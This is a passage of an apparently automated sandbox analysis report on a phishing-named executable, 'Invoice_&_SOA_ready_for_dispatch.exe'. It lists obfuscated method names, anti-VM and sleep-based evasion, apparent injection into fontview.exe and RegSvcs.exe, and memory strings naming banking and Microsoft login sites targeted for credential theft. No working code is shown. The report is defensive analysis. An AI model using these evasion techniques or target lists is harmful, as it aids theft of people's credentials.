            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, qf4GXpZFHWDeRXEG4U.csHigh entropy of concatenated method names: 'MHywlWPJXf', 'TVawWxRqi5', 'vxbwavEJWE', 't9Iw9xL4Ch', 'LF3wdwtk6c', 'd98anSFTQU', 'hxDaZBk04u', 'Y9HaPtoHA6', 'AnjaHm58Gh', 'uXZaOKTkLa'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, LwJl6CvUyeg8svQ1xg.csHigh entropy of concatenated method names: 'ToString', 'on18hLbRQM', 'P11852XEaS', 'm278G5GCSn', 'mUl8C7OhKN', 'c998YwQckJ', 'i9J8EFi91L', 'BaC81C2WNj', 'VOb8bWfPm8', 'YXh8QLKtbH'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, wuiZa4ArYNDqxPaeeT.csHigh entropy of concatenated method names: 'pogS7uU8Is', 'YfYS5cgaNu', 'j6oSG20Yp5', 'DBGSCMZU2k', 'z9pSMgt05Y', 'vjjSYsttls', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, fEHLeR3dPPRvbC3VFV4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CYpIM9gywr', 'jIdIkOFylC', 'W0BIAEa2Pa', 'XEiIph19JH', 'lcpInwabxP', 'BTZIZBOKJ1', 'AdGIP7HXt4'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, WZ1B83N7tm7Z8cDgrB.csHigh entropy of concatenated method names: 'SocSs3A5hL', 'Sh5SWjDkVY', 'FUVSLIvpOM', 'FrQSaiObsX', 'F7VSwUrDaW', 'vcXS9ikPHE', 'AWJSdWlRPD', 'RAcSBlEB8U', 'UaRSqae5CN', 'huqSf7xsFQ'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, U78ry4qNS50VEaZ2mE.csHigh entropy of concatenated method names: 'Clf49tC78P', 'o9p4dWG7vP', 'hnk4qKkp29', 'r5j4fXZw7L', 'qM142tNt6o', 'Ltx48bTAK6', 'yQR9tSxVRZ9YMZNLJA', 'wvnnUFCH7eA4g6uRP0', 'MZC44o2pXP', 'ULD4esfweN'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, OCeGR9WhUIbmo58hGM.csHigh entropy of concatenated method names: 'Dispose', 'S2b4OCjSNc', 'z6aK5hHNRL', 'ji6mm6OVSD', 'DHq4gmhxKc', 'Id04zJUbLY', 'ProcessDialogKey', 'LZcKXcnAp6', 'PiGK4Z2w8H', 'BWMKKHuINe'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, FhqF3be3IiJ78OZX0B.csHigh entropy of concatenated method names: 'iJD9s1ruR2', 'RZC9Lnny3K', 'XIn9wNksZP', 'pgZwgjk7f9', 'ixywze9IUG', 'q4x9Xso9P0', 'd1V94J1Cvh', 'QQ49KvIbHY', 'F699eYUr3W', 'SEF901dK1p'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, hqa0uvwF8y24dfnEmR.csHigh entropy of concatenated method names: 'xdi9jIR5Cj', 'TVW96JE1bE', 'mDg93v7iZV', 'piZ9xQGFV4', 'p0F9VlrsOU', 'rvr9TPPOuw', 'K6D9yUaS6B', 'YbE9JbEYcs', 'ou59R3mIPE', 'fLD9i5oWTG'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, CWH5un3Y7hXN01WGKc4.csHigh entropy of concatenated method names: 'Ng7tj8HcP9', 'ddQt6kFZxA', 'PTIt3Ashuo', 'vLStx16EMM', 'ut7tVGA6Tm', 'Q6XtTbx57d', 'fU8tyjDw7B', 'O1OtJrcYm2', 'mgNtRGSttm', 'hKptiZ4Rip'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, k7qEmYaQgpXjRvxX0y.csHigh entropy of concatenated method names: 'SjkvHLySEw', 'bQHvg3LIxt', 'KIPSX8Gxm8', 'tkKS4TcLdk', 'a2VvhVIwEt', 'aBgvDnrSRK', 'rUdvURaZIO', 'RkmvMB83U2', 'DnLvkEt5ye', 'LAivAcADEf'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, kn3HsVKGcYhQIYc6U1.csHigh entropy of concatenated method names: 'Hag3CTPFA', 'jFcxeDImu', 'BAeTyTbNs', 'cyGy5olns', 'tAmRn63Dl', 'kXSiGOjk5', 'AAdq2s7cY5xMiw0S3I', 'UHK7AioHjQ2GhK5bYD', 'BDYSiQPxW', 'wyrIH3V5Y'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, GiG0pYCKrDVP3rTfDp.csHigh entropy of concatenated method names: 'QU1uJIMdBL', 'jJjuR91ERu', 'Mqku7qyntM', 'eWZu5Q3MLF', 't3ZuC4anai', 'ptsuYEV1L7', 'FYlu118j8i', 'TOPublhwIa', 'SrcuFUgGL7', 'guDuhpAml1'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, aOMcGCJjyGfal9CoD2.csHigh entropy of concatenated method names: 'iCUaVfcOxe', 'KUtaybPXFa', 'SNMLGyP8Zw', 'DNBLC2U4E6', 'NNnLY7GqKY', 'ttSLEliY9Y', 'qLfL1iiLUe', 'gPpLbZdS26', 'rdwLQWrCBs', 'LCYLF1e4bs'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, RFebm5uyGmJYMUbdFA.csHigh entropy of concatenated method names: 'UG9LxeiU1t', 'XeOLT3nAsA', 'SqvLJb2Jlv', 'jBWLRUNZwd', 'g76L2DHYYY', 'LnKL8hbaco', 'vySLvX67EA', 'PUDLStN0oX', 'yHOLtfy8uH', 'EoGLIXjoEC'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, moU0AkpAA5e5deHjGQ.csHigh entropy of concatenated method names: 'EPwelUQ884', 'cFNesYs68v', 'KaoeWPZuJP', 'N0KeLYXxo1', 'UOwea72VT0', 'tZ7ewqQkyQ', 'MWie9a3EFM', 'tjoedRcg49', 's5JeBI9oPS', 'ikyeqg79at'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, wXBrPU2mKX2DW6Sp7G.csHigh entropy of concatenated method names: 'jA6WMF2PhT', 'gjWWkLwcOc', 'VZ3WAIa5Yu', 'nlGWpNvBFu', 'HKPWnh41p0', 'w4JWZmZ6Qe', 'fxuWPI9OlX', 'qejWHlbSq5', 'kpYWOrI9Xq', 'md9WgNafeT'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, VAe6BLDV3qOgFyVjiC.csHigh entropy of concatenated method names: 'wh52Fr2Kpv', 'PyF2DHNFOf', 'HtS2MYNhyD', 'VVc2kgYpOB', 'qCd25KCW0E', 'xf72GqwFMV', 'sgo2C6gQsa', 'G6Y2YTkWHd', 'npY2EDTgeN', 'NGE21un9CM'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, pwk0XiziCPB2HQD6SY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E5ItuwumBb', 'eZTt2dfUIh', 'rdwt8TGKI4', 'YsYtvmcWNv', 'h9MtSRhCQ9', 'hh6ttFNuSj', 'uuRtIqqPR5'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, mphZeO71kLwSC61AIp.csHigh entropy of concatenated method names: 'BIFt4C3NJl', 'KFQteGELqR', 'Y88t06BrZL', 'DvKtsRQjFt', 'OH9tWjF4cC', 'naUtaOSbBU', 'N5ntwd2yfJ', 'dd0SPO5AMe', 'GqOSHG9gdJ', 'E57SOPTmXY'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, wuWA6eL3mDAw53PRlj.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nDBKOIW0du', 'fpiKgjjmO3', 'HIAKzTxLu2', 'OUDeXdMOf7', 'UWhe4OgO0r', 'eQ6eKxuM6Z', 'Ndneeljn2S', 'OpPg46zMp7N97AtbiF'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, qf4GXpZFHWDeRXEG4U.csHigh entropy of concatenated method names: 'MHywlWPJXf', 'TVawWxRqi5', 'vxbwavEJWE', 't9Iw9xL4Ch', 'LF3wdwtk6c', 'd98anSFTQU', 'hxDaZBk04u', 'Y9HaPtoHA6', 'AnjaHm58Gh', 'uXZaOKTkLa'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, LwJl6CvUyeg8svQ1xg.csHigh entropy of concatenated method names: 'ToString', 'on18hLbRQM', 'P11852XEaS', 'm278G5GCSn', 'mUl8C7OhKN', 'c998YwQckJ', 'i9J8EFi91L', 'BaC81C2WNj', 'VOb8bWfPm8', 'YXh8QLKtbH'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, wuiZa4ArYNDqxPaeeT.csHigh entropy of concatenated method names: 'pogS7uU8Is', 'YfYS5cgaNu', 'j6oSG20Yp5', 'DBGSCMZU2k', 'z9pSMgt05Y', 'vjjSYsttls', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, fEHLeR3dPPRvbC3VFV4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CYpIM9gywr', 'jIdIkOFylC', 'W0BIAEa2Pa', 'XEiIph19JH', 'lcpInwabxP', 'BTZIZBOKJ1', 'AdGIP7HXt4'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, WZ1B83N7tm7Z8cDgrB.csHigh entropy of concatenated method names: 'SocSs3A5hL', 'Sh5SWjDkVY', 'FUVSLIvpOM', 'FrQSaiObsX', 'F7VSwUrDaW', 'vcXS9ikPHE', 'AWJSdWlRPD', 'RAcSBlEB8U', 'UaRSqae5CN', 'huqSf7xsFQ'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, U78ry4qNS50VEaZ2mE.csHigh entropy of concatenated method names: 'Clf49tC78P', 'o9p4dWG7vP', 'hnk4qKkp29', 'r5j4fXZw7L', 'qM142tNt6o', 'Ltx48bTAK6', 'yQR9tSxVRZ9YMZNLJA', 'wvnnUFCH7eA4g6uRP0', 'MZC44o2pXP', 'ULD4esfweN'
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: Invoice_&_SOA_ready_for_dispatch.exe PID: 7784, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe TID: 7844Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exe TID: 7708Thread sleep count: 1491 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\fontview.exe TID: 7708Thread sleep time: -2982000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exe TID: 7708Thread sleep count: 8482 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\fontview.exe TID: 7708Thread sleep time: -16964000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe TID: 7928Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe TID: 7928Thread sleep count: 40 > 30Jump to behavior
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe TID: 7928Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe TID: 7928Thread sleep count: 42 > 30Jump to behavior
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe TID: 7928Thread sleep time: -42000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\fontview.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A096E rdtsc 4_2_014A096E
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeWindow / User API: threadDelayed 1491Jump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeWindow / User API: threadDelayed 8482Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 1.3 %
            Source: C:\Windows\SysWOW64\fontview.exeAPI coverage: 2.7 %
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A4C300 FindFirstFileW,FindNextFileW,FindClose,12_2_02A4C300
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 2N-F32-85.12.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: 2N-F32-85.12.drBinary or memory string: tasks.office.comVMware20,11696501413o
            Source: 2N-F32-85.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: 2N-F32-85.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: 2N-F32-85.12.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: 2N-F32-85.12.drBinary or memory string: dev.azure.comVMware20,11696501413j
            Source: 2N-F32-85.12.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: 2N-F32-85.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: 2N-F32-85.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: 2N-F32-85.12.drBinary or memory string: bankofamerica.comVMware20,11696501413x
            Source: 2N-F32-85.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: 2N-F32-85.12.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: 2N-F32-85.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: 2N-F32-85.12.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: 2N-F32-85.12.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: 2N-F32-85.12.drBinary or memory string: outlook.office.comVMware20,11696501413s
            Source: 2N-F32-85.12.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3734880831.000000000114F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
            Source: 2N-F32-85.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: 2N-F32-85.12.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: 2N-F32-85.12.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: 2N-F32-85.12.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: 2N-F32-85.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: 2N-F32-85.12.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: 2N-F32-85.12.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: 2N-F32-85.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: 2N-F32-85.12.drBinary or memory string: global block list test formVMware20,11696501413
            Source: 2N-F32-85.12.drBinary or memory string: outlook.office365.comVMware20,11696501413t
            Source: 2N-F32-85.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: 2N-F32-85.12.drBinary or memory string: interactiveuserers.comVMware20,11696501413
            Source: 2N-F32-85.12.drBinary or memory string: discord.comVMware20,11696501413f
            Source: 2N-F32-85.12.drBinary or memory string: AMC password management pageVMware20,11696501413
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A096E rdtsc 4_2_014A096E
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F4144 mov eax, dword ptr fs:[00000030h]4_2_014F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F4144 mov eax, dword ptr fs:[00000030h]4_2_014F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F4144 mov ecx, dword ptr fs:[00000030h]4_2_014F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F4144 mov eax, dword ptr fs:[00000030h]4_2_014F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F4144 mov eax, dword ptr fs:[00000030h]4_2_014F4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01466154 mov eax, dword ptr fs:[00000030h]4_2_01466154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01466154 mov eax, dword ptr fs:[00000030h]4_2_01466154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145C156 mov eax, dword ptr fs:[00000030h]4_2_0145C156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F8158 mov eax, dword ptr fs:[00000030h]4_2_014F8158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534164 mov eax, dword ptr fs:[00000030h]4_2_01534164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534164 mov eax, dword ptr fs:[00000030h]4_2_01534164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01520115 mov eax, dword ptr fs:[00000030h]4_2_01520115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150A118 mov ecx, dword ptr fs:[00000030h]4_2_0150A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150A118 mov eax, dword ptr fs:[00000030h]4_2_0150A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150A118 mov eax, dword ptr fs:[00000030h]4_2_0150A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150A118 mov eax, dword ptr fs:[00000030h]4_2_0150A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150E10E mov eax, dword ptr fs:[00000030h]4_2_0150E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150E10E mov ecx, dword ptr fs:[00000030h]4_2_0150E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150E10E mov eax, dword ptr fs:[00000030h]4_2_0150E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150E10E mov eax, dword ptr fs:[00000030h]4_2_0150E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150E10E mov ecx, dword ptr fs:[00000030h]4_2_0150E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150E10E mov eax, dword ptr fs:[00000030h]4_2_0150E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150E10E mov eax, dword ptr fs:[00000030h]4_2_0150E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150E10E mov ecx, dword ptr fs:[00000030h]4_2_0150E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150E10E mov eax, dword ptr fs:[00000030h]4_2_0150E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150E10E mov ecx, dword ptr fs:[00000030h]4_2_0150E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01490124 mov eax, dword ptr fs:[00000030h]4_2_01490124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015261C3 mov eax, dword ptr fs:[00000030h]4_2_015261C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015261C3 mov eax, dword ptr fs:[00000030h]4_2_015261C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DE1D0 mov eax, dword ptr fs:[00000030h]4_2_014DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DE1D0 mov eax, dword ptr fs:[00000030h]4_2_014DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DE1D0 mov ecx, dword ptr fs:[00000030h]4_2_014DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DE1D0 mov eax, dword ptr fs:[00000030h]4_2_014DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DE1D0 mov eax, dword ptr fs:[00000030h]4_2_014DE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014901F8 mov eax, dword ptr fs:[00000030h]4_2_014901F8
